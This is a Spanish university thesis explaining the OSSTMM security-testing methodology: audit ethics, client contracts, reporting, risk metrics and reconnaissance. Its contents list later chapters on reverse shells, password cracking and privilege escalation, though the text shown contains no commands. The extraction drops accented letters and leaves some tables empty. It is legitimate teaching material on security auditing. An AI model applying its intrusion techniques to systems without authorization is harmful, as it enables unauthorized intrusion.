Documentos de Académico
Documentos de Profesional
Documentos de Cultura
Auditorias de Seguridad Informatica y La OSSTMM PDF
Auditorias de Seguridad Informatica y La OSSTMM PDF
Informtica y la OSSTMM
Autor:
Alberto Hervalejo Snchez
Director: Dr. Miguel Snchez Lpez, Jose Selvi Sabater
Proyecto
Final
de
Carrera
presentado
en
la
Universidad
Politcnica de Valencia para la
obtencin del ttulo de Ingeniero en
Informtica
Valencia, Julio 2009
Pgina 1
Pgina 2
ndice de contenido
Notas del autor.................................................................................................................................6
Introduccin.....................................................................................................................................6
Parte 1: Documento OSSTMM............................................................................................................8
Aclaraciones previas........................................................................................................................9
Prlogo.............................................................................................................................................9
Introduccin...................................................................................................................................10
mbito o Alcance..........................................................................................................................11
Propsito....................................................................................................................................11
Acreditacin..............................................................................................................................11
Trminos y definiciones.................................................................................................................11
Trminos generales...................................................................................................................12
Conformidad..................................................................................................................................12
Reglas de compromiso:..................................................................................................................13
Ventas y marketing....................................................................................................................13
Evaluacin/Entrega estimada....................................................................................................13
Contratos y negociaciones........................................................................................................14
mbito......................................................................................................................................14
Plan de trabajo...........................................................................................................................14
Proceso del test..........................................................................................................................14
Informes....................................................................................................................................15
Proceso...........................................................................................................................................15
Mapa de Seguridad........................................................................................................................17
Lista de mdulos del mapa de seguridad..................................................................................17
Evaluacin de riesgos....................................................................................................................17
Evaluacin de riesgos................................................................................................................17
Seguridad perfecta:...................................................................................................................18
Mtricas de seguridad....................................................................................................................18
Aplicando Risk Assessment Values..........................................................................................18
Seguridad real.......................................................................................................................19
Seguridad operacional (OPSEC)..........................................................................................19
Controles..............................................................................................................................20
Tipo A.......................................................................................................20
Tipo B.......................................................................................................21
Limitaciones.........................................................................................................................21
Seguridad real.......................................................................................................................23
Secciones y mdulos......................................................................................................................23
Metodologa...................................................................................................................................24
Seccin A Seguridad de la informacin......................................................................................24
1. Revisin de la inteligencia competitiva................................................................................24
2. Revisin de la privacidad......................................................................................................26
3. Recoleccin de documentos..................................................................................................26
Seccin B Seguridad de los procesos.........................................................................................27
1. Testeo de Solicitud................................................................................................................27
2. Testeo de sugerencia guiada..................................................................................................29
3. Testeo de las Personas Confiables.........................................................................................33
Seccin C Seguridad en las Tecnologas de Internet..................................................................34
1. Sondeo de la Red...................................................................................................................34
2. Escaneo de Puertos................................................................................................................37
Pgina 3
3. Identificacin de Servicios....................................................................................................37
4. Identificacin del Sistema.....................................................................................................37
5. Bsqueda de Vulnerabilidades y Verificacin.......................................................................38
6. Testeo de Aplicaciones de Internet........................................................................................39
7. Testeo del Router...................................................................................................................40
8. Testeo de Sistemas de Confianza..........................................................................................43
9. Testeo de Firewall.................................................................................................................43
10. Testeo de Sistemas de Deteccin de Intrusos......................................................................43
11. Testeo de Medidas de Contencin.......................................................................................45
12. Password Cracking..............................................................................................................45
13. Testeo de Denegacin de Servicio......................................................................................46
14. Revisin de las Polticas de Seguridad...............................................................................47
Seccin D Seguridad en las Comunicaciones.............................................................................48
1. Testeo de PBX.......................................................................................................................48
2. Testeo de Buzn de Voz/Contestador....................................................................................49
3. Revisin de los faxes.............................................................................................................50
4. Testeo de Mdems.................................................................................................................51
Seccin E Seguridad Wireless....................................................................................................53
1. Testeo de Radiacin Electromagntica.................................................................................53
2. Testeo de Redes Wireless......................................................................................................54
3. Testeo de Redes Bluetooth....................................................................................................55
4. Testeo de Dispositivos Inalmbricos.....................................................................................57
5. Testeo de Dispositivos Inalmbricos de Mano......................................................................58
6. Testeo de Comunicaciones Inalmbricas..............................................................................58
7. Dispositivos de Vigilancia Inalmbricos...............................................................................59
8. Dispositivos de Transacciones inalmbricas.........................................................................60
9. Testeo de RFID.....................................................................................................................60
10. Testeo de Infrarrojos...........................................................................................................62
11. Revisin de privacidad........................................................................................................63
Seccin F Seguridad Fsica.........................................................................................................63
1. Revisin de Permetro...........................................................................................................63
2. Revisin de Monitorizacin..................................................................................................63
3. Testeo de Controles de Acceso..............................................................................................63
4. Revisin de Respuesta ante Alarma......................................................................................63
5. Revisin de Localizacin......................................................................................................63
6. Revisin del Entorno.............................................................................................................64
Parte 2: Conceptos Tcnicos...............................................................................................................65
Introduccin...................................................................................................................................66
Introduccin a Backtrack y justificacin.......................................................................................66
Instalacin del ambiente de pruebas..............................................................................................66
Backtrack servicios bsicos...........................................................................................................67
Cambiar la contrasea que viene por defecto en BackTrack. ..................................................67
Configuracin y puesta en marcha los servicios bsicos de BackTrack. .................................67
Puesta en marcha de servidor SSH...........................................................................................68
Servidor Web.............................................................................................................................69
Servidor atftpd...........................................................................................................................69
Servidor VNC............................................................................................................................70
Backtrack Netcat............................................................................................................................71
Identificando Banners de Servidores web.................................................................................73
Modo Listen de Netcat..............................................................................................................74
Pgina 4
Envo de archivos......................................................................................................................75
Administracin remota..............................................................................................................76
Shell inversa..............................................................................................................................77
Test de penetracin........................................................................................................................77
Introduccin..............................................................................................................................78
Escaneo e identificacin del sistema.........................................................................................78
NMAP..................................................................................................................................78
Introduccin.....................................................................................................................78
Host discovery.................................................................................................................79
Escaneo de puertos..........................................................................................................80
Errores.............................................................................................................................80
Mquinas online..............................................................................................................82
Exploracin inicial de la mquina 192.168.1.100...........................................................82
Verificacin de puertos abiertos con servicios escuchando.............................................86
Recoleccin de informacin.................................................................................................89
Ataques de diccionario.........................................................................................................89
Nombres de usuario.........................................................................................................90
Diccionarios.....................................................................................................................90
xHydra.............................................................................................................................90
Exploracin del sistema........................................................................................................94
Escalada de privilegios.........................................................................................................95
Descifrando Shadow.............................................................................................................95
Valoraciones finales.......................................................................................................................97
Valoracin primer taller............................................................................................................97
Valoracin del segundo taller....................................................................................................97
Parte 3: Conclusiones y cierre del Proyecto.......................................................................................99
Conclusiones y cierre...................................................................................................................100
Bibliografa..................................................................................................................................101
Pgina 5
Introduccin
La seguridad de las TI es un tema frecuente al que se enfrentan las empresas en estos ltimos
meses. Se ha hablado de fallos de seguridad incluso en medios de comunicacin no especializados,
por ejemplo del fallo en el protocolo DNS
[http://www.elpais.com/articulo/internet/fallo/peor/temido/elpeputec/20080807elpepunet_7/Tes]
(que tanta repercusin ha tenido)y el del no tan conocido BGP
[http://www.elpais.com/articulo/internet/Internet/deja/abierta/puerta/espias/elpeputec/20080827elpe
punet_5/Tes], lo cual hace ver, la importancia que est tomando la seguridad en la sociedad actual, y
sobre todo en la de las empresas.
Pgina 7
Pgina 8
Aclaraciones previas
Esta parte del presente documento, no pretende ser una traduccin de la versin pblica ms
actualizada de la Open Source Security Test Methodology Manual (OSSTMM de ahora en
adelante). Tampoco pretende ser una metodologa que la sustituya, ni pretende ser un documento
legal u oficial. Se pretende, pues, que sea un documento de consulta, para aquellas personas que
deseen enfrentarse a una metodologa de seguridad informtica por vez primera, y que, tras
enfrentarse al crudo (y en ocasiones demasiado correcto) lenguaje de una metodologa, quieran un
acercamiento previo, con un lenguaje ms propio de un ingeniero en informtica. Sin embargo,
tampoco se pretende ahondar en cuestiones tcnicas (refirindonos por tcnicas a las herramientas
que habr de usarse), sino en que el lector pueda encontrar ejemplo y explicaciones de lo que se
encuentra en cada seccin. Se aadirn casos con los que el autor de este documento se ha
encontrado en su investigacin para la realizacin del mismo, y se incluirn aquellas partes de la
OSSTMM que se crean oportunas para la comprensin de la misma.
Se pretende tambin, seguir el orden y secciones de la OSSTMM, aunque en algunas ocasiones se
pueda omitir alguna seccin que el autor considere que no sea importante resaltar. Es por ello, que
se recomienda al lector, leer el presente documento con una copia de la OSSTMM al lado para
poder ir comprobando, punto a punto, las secciones incluidas, y las no incluidas.
A continuacin, se presenta la primera seccin de la OSSTMM, el prlogo.
Prlogo
El testeo metdico de seguridad es distinto de los tests de penetracin. Es una combinacin de
creatividad, el constante conocimiento de nuevas buenas prcticas y de amenazas conocidas. Es
llevar las cosas hasta el extremo, a los peores casos, para asegurarnos de que esas buenas
prcticas son realmente buenas prcticas. Es el conocer que sucedera con situaciones que damos
por controladas, y que generalmente, prevemos que no van a ir mal, y llevarlas al extremo. Se trata
de asegurarnos de que en esos extremos, el sistema sigue comportndose tal y como esperaramos
que lo hiciera. Comprobar qu sucede si un intruso se hiciera pasar por alguien de la organizacin,
cmo se comportara un sistema ante la llegada masiva de datos, qu sucede si se cortase el
suministro elctrico... Debemos preguntarnos qu sucede si forzamos la seguridad al mximo, y
comprobar donde aparecen las mayores deficiencias o debilidades. En qu circunstancias aparecen
stas?
Adems, son estos pequeos detalles (por ejemplo, que un programa no compruebe una entrada
de datos), que no son visibles, donde un hacker malintencionado encontrar la puerta de entrada,
ya que todo aquello que no son detalles son fcilmente encontrados, y por tanto, solucionados.
Eficiencia y creatividad:
Aunque el presupuesto sea bajo, debemos intentar que el poco tiempo que podamos dedicar al
testeo sea lo ms eficiente posible. As podremos justificar bien nuestro trabajo. Las
organizaciones vern que lo que han pagado por los servicios prestados realmente sirven de
algo, y muchas ms organizaciones querrn hacerlo. Hay que trabajar de forma ordenada,
tenerlo todo preparado para antes de empezar, y trabajar de forma profesional y rpida. Muchas
empresas ven las auditoras como un gasto, quizs no intil, pero no tan importante como lo
pueda ver un auditor, y suelen invertir poco dinero en ello.
Introduccin
La OSSTMM comenz all por finales del ao 2000, y creci rpidamente gracias a la experiencia
de miles de personas que contribuyeron al proyecto. Gracias al hecho de ser una metodologa libre,
los testeadores participan en un gran plan contribuyendo al movimiento open-source, y
estandarizando una metodologa que todo el mundo pudiera acceder, o a mejorar, por lo que creci
enormemente hasta convertirse en uno de los principales referentes en su campo hoy en da.
Originariamente, perteneci al dominio ideahamster.org, que ms adelante pas a ser el actual
ISECOM (Institute for Security and Open Methodologies). En 2003, ISECOM estuvo registrada
como como una organizacin sin nimo de lucro en Espaa y en los EEUU. Hasta ahora, la
OSSTMM trataba solamente una forma de hacking tico, pero en 2005, pas a ser una forma de
verificar que la seguridad se estaba tratando de forma correcta a nivel operacional, y en 2006, este
manual pas a ser el estndar para aquellos que necesitaran una seguridad ms all del que la
legislacin y regulaciones ofreciesen.
Un punto importante de la OSSTMM, es el tener en cuenta que el objetivo del manual, es crear un
solo mtodo para realizar pruebas de seguridad en profundidad. Es un conjunto de pasos que deben
ser realizados una y otra vez, hasta que los resultados esperados se obtengan. No es la idea (ni se
encontrar en ninguna otra parte) el recomendar al auditor el utilizar esta metodologa como un
diagrama de flujos o utilizarla como una serie de pasos con un cierto orden formal, sino
simplemente haber completado y revisado todos los pasos que se contemplan, en el tiempo
establecido.
Algo en lo que esta metodologa hace hincapi, es el hecho de que muchos testeadores de seguridad
Pgina 10
creen que los tests de seguridad son una fotografa del punto actual de seguridad en el sistema. El
tener una visin actual y puntual de como es el sistema en ese momento. Pero... es esta
fotografa suficiente? La metodologa intenta enriquecerlas con los llamados Risk Assessment
Values o Valores de Evaluacin de Riesgos (de ahora en adelante RAVs), que proporcionarn
informacin extra en contextos tales como frecuencias y tiempos al test de seguridad. La
fotografa se convertir en un perfil o Profile abordando un rango de variables a lo largo de un
periodo de tiempo antes de degradarse por debajo de los niveles de riesgo aceptable. Estos RAVs y
Profiles se explicarn con detalle en su seccin correspondiente.
Por ltimo, otro de los objetivos de la metodologa es que pueda evitarse, que el estilo personal,
asunciones falsas, o prejuicios de los testeadores intervengan en los resultados del test. El uso de
una metodologa igual para todo el mundo, conseguir la imparcialidad de los tests, y por lo tanto,
que tengamos una base comparable entre sistemas, pudiendo as comparar unos con otros, y
graduarlos.
mbito o Alcance
Propsito
Como ya se ha comentado antes, el principal objetivo o propsito es el ofrecer una metodologa
cientfica a los tests de seguridad, pero adems, ofrece una gua a los auditores para realizar una
auditoria OSSTMM certificada. Esta gua existe para asegurar que:
La prueba se ha realizado con detalle.
La prueba incluye todos los canales necesarios.
Que se haya realizado con concordancia con los derechos civiles
Que los resultados sean cuantificables.
Que los resultados sean consistentes y repetibles.
Que los resultados contengan slo hechos derivados de los mismos tests y nada ms.
Acreditacin
Como hemos dicho, se puede realizar una auditoria OSSTMM certificada. Para ello, se requiere un
informe de auditoria de la OSSTMM firmada por el testeador o analista que cumpla los requisitos
de informes. Estos informes, junto con una versin annima del informe de auditoria remitida a
ISECOM para revisin proporcionar una certificacin, que entre otras ventajas, har responsable al
auditor y servir de prueba del test, y por tanto algo que probar que el sistema ha superado el
control de calidad de seguridad de OSSTMM, lo cual siempre ser deseable para cualquier
empresario.
Trminos y definiciones
Pgina 11
Trminos generales
Escaneo
Conformidad
Esta seccin, aunque no contiene aspectos puramente informticos, he credo que sera interesante
incluirla, pues hay algunas definiciones legales que en Espaa difieren del resto del mundo.
Adems, es posible, que a un Ingeniero en Informtica, le resulte ms interesante hacerse una idea
general de sta seccin. Para una definicin ms completa o formal, siempre se puede consultar la
propia OSSTMM o textos jurdicos.
La concordancia es el alineamiento con una serie de polticas generales. La OSSTMM reconoce
tres tipos de concordancia:
1. Legislacin: la legislacin la entendemos como la ley. En caso de no estar en conformidad
con la ley, puede llevar a cargos criminales (con pena de crcel) o sancin econmica, tal y
como estipula la Constitucin Espaola y el resto del ordenamiento jurdico. Cabe destacar,
que en la OSSTMM habla solamente de cargos criminales, sin embargo, en Espaa se
distingue tambin la sancin econmica. La OSSTMM aqu en Espaa est en conformidad
con la LOPD (Ley Orgnica de Proteccin de Datos) y la controvertida LSSICE (Ley de
Servicios de la Sociedad de Informacin) impuesta en 2002 como LSSI (llamada muchas
veces como la Gestapo Digital), que tanto dio que hablar entre los internautas. Se puede
Pgina 12
encontrar un artculo muy interesante sobre esta ley en el nmero 2 de Los Cuadernos de
HackxCrack.
2. Regulacin: en este apartado, se habla de actividades reguladas (es decir, que no hayan
lagunas), de forma que no haya miedos o reparos por parte de las organizaciones para tomar
estas acciones. Lo opuesto a lo regulado, sera lo comnmente conocido como bordear la
ley. Una empresa, siempre preferir tomar decisiones o acciones que estn reguladas para
no arriesgarse a posibles penas de crcel o sanciones econmicas.
3. Polticas: stas se conocen, muchas veces como directrices, guas, normativas, o prcticas
hacia el cumplimiento de los objetivos de una organizacin. Tambin se les suele conocer
como buenas prcticas. La OSSTMM, entre otras, est de conformidad con las
publicaciones de la NIST (National Institute of Standards and Technology), famosa por
algunos ttulos en seguridad informtica que ofrece.
Reglas de compromiso:
En esta seccin se habla de prcticas ticas, que todo aquel que realice esta metodologa debera
seguir. A personas afiliadas, compaeros, miembros del equipo o asociados a ISECOM estn
obligados bajo contrato a cumplirlas. De la versin anterior del documento a esta, se han suprimido
algunos apartados (conocidas en la anterior versin como reglas adicionales) que hacan
referencia a algunos clculos que debera de hacerse para la estimacin del tiempo y para el test de
seguridad. Recomiendo su lectura en caso de estar interesado en caso de estar interesado en un
anlisis ms metdico (aunque no viene estipulado en la presente metodologa).
Ventas y marketing
A la hora de vender nuestros servicios para realizar un test de seguridad, no debera usarse el miedo.
Tampoco debera de ofrecerse servicios gratuitos en caso de no poder penetrar en los sistemas, ni
intentar penetrar en ellos sin el consentimiento escrito del cliente. Esto, hasta ahora parece lgico
(tanto legal, como ticamente), pero algo que sorprende, es el hecho de que no pueda usarse los
nombres de antiguos clientes (ni siquiera con su consentimiento!) como forma de promocionarse,
aunque s de otras secciones de la misma organizacin. Algo que tambin suele sorprender, es la
buena prctica de no realizar concursos (o prcticas ilegales, por supuesto) de cracking, hacking etc
para promocionarse. Esto contrasta con la extendida idea de los hackers que van a la crcel, y ms
tarde encuentran trabajo en muy poco tiempo. Por ltimo, cabe decir que los clientes deberan de
conocer objetivamente el estado la seguridad y las medidas de seguridad que posee.
Evaluacin/Entrega estimada
En esta seccin, solo quiero resaltar, el hecho de que no debera de realizarse tests de seguridad
sobre sistemas obviamente poco seguros, o hasta que los sistemas de seguridad hayan sido puestos
en marcha. Esto es algo que parece obvio, sin embargo, debe ser recordado, pues poca gente se lo
plantea a la hora de realizar el test.
Pgina 13
Contratos y negociaciones
Segn la OSSTMM, y en la mayora de las dems metodologas, el auditor de seguridad debe de
mantener un compromiso fuerte con el cliente. Es de suponer, que el tratar una cuestin tan delicada
como es la seguridad, haya que definir y dejar muy claro todo lo que se va a realizar. Por ejemplo,
se le exige al auditor, confidencialidad y la no revelacin de secretos (lgico). Revelar contraseas,
infraestructuras etc.. sera peor que no realizar la propia auditora.
Por otra parte, los contratos deberan incluir limitaciones en la responsabilidad del auditor (teniendo
en cuenta el coste de la auditora, claro), a menos que hay claros indicios de mala fe. Es lgico
suponer, pues, que para que se incluya esto, el auditor debera de informar (y por supuesto esto
debera de reflejarse en el contrato) los limites y peligros del test que se va a realizar (adems de la
informacin de desde donde se va a realizar los tests, IPs, etc). Adems, en el contrato se debera
incluir personas de contacto, o un telfono de emergencia.
Otra cuestin importante, es el que deba incluirse permiso especfico para tests relacionados con
denegaciones de servicio, fallos en la supervivencia, anlisis de proceso, o ingeniera social. Estos
son muy delicados, ya que pueden implicar paradas de sistemas de produccin, o interrumpir el
funcionamiento normal del sistema.
Por ltimo, y algo que podra no parecer importante, debera de incluirse tambin, el futuro proceso
de contrato, y cambios de condiciones de trabajo.
Como vemos, el auditor, debera de asegurarse bien de que el cliente entiende lo que va a realizar, y
asegurarse de que en caso de suceder un imprevisto, todo haya sido escrito en el contrato.
mbito
Esta seccin es muy corta en la OSSTMM, pero me parece de vital importancia que se deba resaltar
claramente, los limites del alcance del test, y no comenzar el test, antes de dejar todo esto definido
en el contrato.
Plan de trabajo
En esta seccin, se habla del plan que el auditor debera de confeccionar para realizar el test. En el
se debera incluir el tiempo dedicado, tanto en fechas como horas de trabajo, incluyendo tanto el
tiempo del test en s, como su anlisis.
Comparando esta seccin de la OSSTMM (la 2.2) con la versin anterior, en esta seccin se ha
incluido el que el plan de testeo no debe incluir planes, procesos, tcnicas o procedimientos que
estn fuera del rea de competencia obtenido por entrenamiento y educacin del auditor. Esto
parece estar en concordancia con el espritu del documento, ya que en l, no se incluyen
herramientas, ni comandos a utilizar, intentando no inmiscuirse en aspectos tcnicos.
no hago referencia), que me llaman la atencin. Por ejemplo, el hecho de que no debera permitirse
grandes cambios de objetivos por parte del cliente, protegindose as, al auditor, de tener que salir
constantemente de sus planes por, si se me permite la expresin, caprichos del cliente. Adems, se
le har firmar al cliente un consentimiento para eximir al auditor de daos ocasionados durante la
auditora, o de allanamiento, a menos que haya mala fe durante la auditora.
Otro punto que me gustara resaltar, es el de que la metodologa dice que no debera subirse los
niveles de seguridad durante la auditora, y para ello, solamente se debera de avisar a algunas
personas sobre el test.
Si el test se realiza con algn tipo de privilegios, primeramente, debera realizarse sin ninguno, y
despus, debera de darse dos accesos distintos (por ejemplo, dos passwords de reas distintas)
tpicos, ni ms ni menos seguros que los que se usan de forma regular.
Por ltimo, creo importante resaltar, el que las grietas de seguridad importantes encontradas,
deberan de ser notificadas inmediatamente al cliente.
Informes
En esta seccin se incluye, en su mayora prcticas de sentido comn (aunque nunca est de ms
recordarlo) como temas de privacidad, objetividad etc.. que recomiendo leer al menos una vez, para
preguntarnos si realmente lo hemos cumplido.
Como puntos a destacar:
Si en alguna investigacin o prueba, hemos de hacer mencin de alguna persona que no est
entrenada en seguridad, o no perteneciente al personal de seguridad, solamente debera mencionarse
en forma de estadsticas o sin identificarlo.
En los informes, deberan incluirse tanto las medidas de seguridad fallidas como las que no,
adems de las anomalas e incgnitas encontradas durante la exploracin. Es decir, debemos,
adems de informar del trabajo que hemos realizado, nuestros lmites o trabajo no realizado.
Antes de enviar el informe, deberamos informar al cliente de que vamos a hacerlo, y establecer un
canal seguro para su entrega. Sera fatdico que, despus de todo el trabajo realizado, se echara a
perder porque los informes cayeran en manos equivocadas.
Proceso
El proceso del testeo, est considerado como un evento de test discreto de un sistema dinmico y
estocstico. Por estocstico, entendemos aquel sistema que funciona, sobre todo por el azar. Con
esto no nos referimos a la indeterminacin de los sistemas informticos, sino a la gran cantidad e
variables que interactan las unas con las otras. Y no nos referimos nicamente a la interaccin
entre distintas mquinas, sino tambin a su entorno. A pesar de que podamos tal vez, adivinar el
estado futuro del sistema bajo ciertas condiciones, o de su entorno (por ejemplo, podemos saber que
en un pas cercano al ecuador har ms calor que en uno nrdico), nunca podremos estar
completamente seguros de ello.
Un test discreto examina el estado de este sistema dinmico en periodos de tiempo discreto.
Monitorizar tareas de forma contnua dejara de ser prctico (demasiada informacin, coste
computacional y espacial... etc).
Teniendo esto en cuenta, el auditor intentar abordar el sistema de una forma distinta a la que el que
lo implement pensaba: poner el sistema al limite, simular situaciones anmalas para comprobar
que el sistema realiza las funciones que se supone que debera de realiza. El auditor simula las
Pgina 15
condiciones de esas situaciones, y monitoriza para comprobar los resultados. Sin embargo, no
debemos fiarnos al 100% de estos datos obtenidos, ya que muchas veces pueden aparecer errores,
algunos de ellos devastadores para el objetivo.
Estos errores son:
1
Falso positivo
Falso negativo
Gray positive
Gray negative
Specter o espectral
Indiscretion o indiscrecin
Error de entropa
Falsificacin
Error de muestreo
Restriccin
11
Propagacin
12
Error humano
Muchos de estos tipos de errores, no se suelen utilizar habitualmente dentro del mundo de la
seguridad informtica. Los ms comunes son los falsos positivos/negativos o el error humano. El
resto, la metodologa los incluye, y deben de conocerse si se quiere seguir la metodologa de forma
precisa.
Mapa de Seguridad
No voy a extenderme mucho en esta seccin y subsecciones, ya que simplemente presenta una lista
de mdulos y un diagrama que me parece muy claro en el documento original. Sin embargo, hay un
par de puntos interesantes:
El
primero, es que a pesar de que hay una serie de mdulos claramente especificados, estn todos
relacionados, por lo que al hacer pruebas en uno de ellos, se est comprobando algunas partes de
otro.
El segundo, es que para que pueda decirse que se ha realizado un test de seguridad de la OSSTMM
para una Seccin en particular, todos los mdulos de la seccin tienen que haber sido comprobados,
y si en la infraestructura estudiada no existe un objetivo para un mdulo, entonces se deber
determinar como no aplicable en las tablas al final del documento, que debern de ser entregadas
como parte del informe final.
Evaluacin de riesgos
Evaluacin de riesgos
Pgina 17
Segn la OSSTMM, riesgo significa que, el limitar la seguridad tenga un efecto perjudicial en las
personas, informacin cultural, los procesos, negocios, imagen, propiedad intelectual, derechos
legales o capital intelectual. Es importante conocer esta definicin para tener clara la postura que
toma la OSSTMM a la hora de tratar lo que las personas entendemos por riesgo y as, saber que
entra como parte del trabajo del auditor/tester para realizar su trabajo. Se distinguen cuatro
aspectos:
Seguridad
Seguridad perfecta:
En la metodologa, se sigue la tcnica de seguridad perfecta donde el tester y el analista guan al
cliente, hacia lo que debera ser la seguridad perfecta, que puede contrastar con muchos aspectos,
como las buenas prcticas, la regulacin de la industria, justificaciones de negocio etc.. donde el
cliente no puede permitirse el implementar esa seguridad perfecta. El resultado de esto, es la
seguridad perfecta para un cliente determinado, y el tester y analista, entonces, comprobarn el
estado de la seguridad real con esa seguridad perfecta.
En esta seccin se incluye tambin una lista de buenas prcticas (tericas) hacia la seguridad
perfecta, cuya lectura recomiendo, del documento original.
Mtricas de seguridad
Esta parte, es de las ms importantes de la metodologa, ya que convierte el proceso de test de
intrusin/auditora en algo medible, comparable y escalable. Adems, en ellas se refleja no solo los
datos tangibles y referentes a la red, sino que tambin se ven que partes son inexactas o distorsiones
de resultados.
En esta metodologa, a las mtricas se las conoce como Risk Assessment Values (RAVs). Estos no
son anlisis de riesgos en s mismos, sino que proporcionan datos concretos para un anlisis de
riesgos ms concreto y real.
Sin embargo, el Actual Security (o seguridad real) solo puede ser calculado por el alcance original.
Si hubiera algn cambio en el alcance (como pudiera ser el nmero de objetivos, por ejemplo),
habra que recalcular los hashes. Ahora bien, tambin es posible, coger 2 (o ms) mbitos distintos,
y combinarlos para calcular una Actual Security para todos, considerarlo como un alcance ms
grande.
Seguridad real
Tipo
Descripcin
Operaciones
Controles
Limitaciones
Descripcin
Visibilidad
Confianza
OPSEC Delta
Controles
La OSSTMM divide los tipo de control en dos grandes categoras. El tipo A (interactivo) y el tipo B
(proceso). A continuacin presento los tipos y una descripcin:
Tipo A
Tipo
Breve descripcin
Autenticacin
Indemnizacin
Subyugacin
Continuidad
Resistencia
Tipo B
Tipo
Descripcin
No-repudio
Confidencialidad
Privacidad
Integridad
Alarma
Control Delta
Limitaciones
Las limitaciones de un sistema, describen el estado actual de su seguridad en cuanto a errores se
refiere. stos, se dividen en varias categoras: vulnerabilidades, debilidades, preocupaciones,
exposiciones y anomalas. Ms adelante, en esta misma seccin se ahondar en estos conceptos.
Existe la creencia, de que las limitaciones solamente son limitaciones cuando no tienen justificacin
en el negocio. Puede que desde el punto de vista empresarial as sea, pero desde el punto de vista
Pgina 21
del auditor, lo son, y han de ser tenidas en cuenta. El auditor las recopilar en los informes, y ser
responsabilidad del cliente el tenerlas en cuenta o no. El hecho de que quiera ponerles solucin o
no, es una cuestin propia de la estrategia de negocio, donde el responsable de esos activos decidir
si el riesgo que supone el perder (y recuperar) no justifiquen los costes de reparar o controlar esa
limitacin. Adems, existen otras razones, como la legislacin vigente en la zona del negocio, que
impiden el controlar estos fallos. Por ejemplo, el leer el correo de los empleados para evitar
filtraciones de informacin est prohibido en Espaa sin orden judicial.
Otro punto importante a tener en cuenta a la hora de contabilizar las limitaciones del sistema, es el
que se deberan contar los errores de seguridad por objetivo, y no los objetivos con errores. Es decir,
debemos hacer constancia de cada fallo que tiene cada objetivo.
A continuacin presento una descripcin de los tipos de limitaciones, y algunos ejemplos de ellos,
centrndome en las ms relacionadas con telecomunicaciones o datos. Para ms ejemplos, leer la
propia metodologa. Incluye ejemplos de PHYSEC, HUMSEC, COMSEC data, COMSEC
telecommunications, SPECSEC.
Tipo de limitacin
Descripcin y ejemplos
Vulnerabilidad
Debilidad
Preocupacin
Exposicin
Seguridad real
Para poder medir el estado actual de la seguridad, se requiere un clculo final para poder comparar
los distintos sistemas, la Seguridad Real. sta combina los tres hashes que hemos descrito
anteriormente (operacional, controles y limitaciones), y los combina en un cuarto.
Los parmetros que pasamos a describir a continuacin, son utilizados a modo comparativo. El
valor que realmente interesa a la hora de entregar los resultados al cliente, es realmente los RAV,
que el propio ISECOM calcular en funcin de los resultados que se les enve en las plantillas que
se adjuntan al final de la metodologa. Para poder obtener el certificado de que se ha pasado la
auditora OSSTMM con xito, se deber tener, al menos, un 95% en el RAV, y revisarse una vez al
ao.
La forma exacta de calcular los valores que presento a continuacin vienen descritas en un
documento en la propia web de ISECOM. Se recomienda su lectura solamente a desarrolladores,
aunque siempre es interesante echarles un vistazo para poder tener en cuenta que es lo que estamos
haciendo:
1.Delta real: Opsec Delta + Control Delta Limitaciones Delta. Debemos recordar que el Control
Delta, es la suma de todos los controles multiplicado por 0.1. ste parmetro es til para poder
estimar el cambio en delta que la solucin que el cambio en el sistema aportar.
2.Seguridad real (total): es el estado real de la seguridad presentado como un hash de las tres
secciones, y representado en un porcentaje donde el 100% representa un balance entre los controles
por puntos de interaccin vs activos sin limitaciones.
Secciones y mdulos
En la metodologa, esta seccin hace una descripcin de consejos que deben de tenerse en cuenta a
la hora de seguir los mdulos, secciones y tareas concretas a la hora de realizar el test de intrusin,
como por ejemplo el hecho de que se debe de ser imparcial a la hora de realizar las tareas para
poder obtener resultados de la forma ms objetiva posible. Esto ya se ha descrito anteriormente en
el presente documento. Se habla tambin de que el tiempo es relativo, ya que no todos los sistemas
son iguales. Y no solo con respecto al tamao, sino tambin a la complejidad del sistema.
En las prximas secciones, pretendemos describir los distintos mdulos que existen en la
metodologa, incluyendo experiencia propia, o investigaciones que se han ido realizando sobre las
mismas a lo largo de la realizacin del presente documento. Para poder consultar las tareas
concretas, y para poder realizarlas correctamente, remitimos al lector al documento original.
Pgina 23
Metodologa
Los tests de seguridad empiezan con una entrada que es, en su forma mas precaria, las direcciones
de los sistemas a auditar. Los tests, terminan con el principio de la fase de anlisis, y la elaboracin
del informe final. La metodologa no afecta a la forma, tamao, estilo o contenido del informe final,
y no especifica como debe de ser analizado. Esto es tarea del tester y/o la organizacin.
La OSSTMM se divide en secciones, las cuales se dividen a su vez en mdulos, y stos, en tareas
concretas. Se debe distinguir, entre recoleccin de datos, y la verificacin de los mismos. Es decir,
no solamente se deber buscar fallos, vulnerabilidades etc, sino que adems, se deber comprobar,
efectivamente, que existen. Es por ello, que una metodologa no debe de compararse con un simple
escaneo de vulnerabilidades o puertos. Para realizar la OSSTMM, adems, hay que comprobar los
resultados obtenidos.
Al definir la metodologa a seguir, es importante no delimitar la creatividad del tester: habr casos,
en los que estndares o formalismos hagan que la calidad del test pueda mitigar, por lo que siempre
ser el tester el que tenga la ltima palabra, y podr realizar los tests segn su experiencia y
creatividad. Cabe aadir, adems, que muchas de las tareas son poco concretas y abiertas,
previniendo el que nuevas tecnologas o caractersticas dejen obsoletas estas tareas. Es comparable
pues, a las leyes jurdicas, donde suelen ser vagas y libres de interpretarse, para que puedan abarcar
mas casos, ya que sera completamente imposible definir toda situacin posible y futura.
Cada mdulo, est relacionad con el anterior y el siguiente, y entre secciones ocurre de forma
similar. Los datos y conclusiones obtenidas en un mdulo, pueden servir para la realizacin de la
siguiente tarea. Por ejemplo, se pueden descubrir nuevos hosts para comprobar.
de la cual depende
Compaas dependientes de la misma
Compaas hermanas
Proveedores
Clientes
Productos que ofrece
Pgina 24
Cualquier IP relevante a algunas de stas, podra ser til al realizar el ataque. Consideraremos
relevantes las IP si stas:
Pertenecen
a la organizacin
Usadas por la organizacin
Estn registradas a nombre de la organizacin
Sirve a la organizacin de alguna forma
Est asociada a la organizacin
Cabe notar, que a la hora de realizar la auditora, hemos de tener muy claro que la informacin
recogida en esta seccin, puede estar tanto dentro, como fuera del alcance de nuestro contrato.
Como sugerencia de un software para realizar esta seccin de forma ordenada, se ha hablado
ltimamente de una aplicacin de software libre, que permite realizar una revisin de la inteligencia
competitiva de forma ordenada. Esta aplicacin se llama Maltego. Segn su web oficial
(http://www.paterva.com/maltego/), describe Maltego como:
Maltego es una aplicacin de inteligencia y forense libre. Permite la minera y recogida de
informacin adems de la representacin de esta informacin de una forma til.
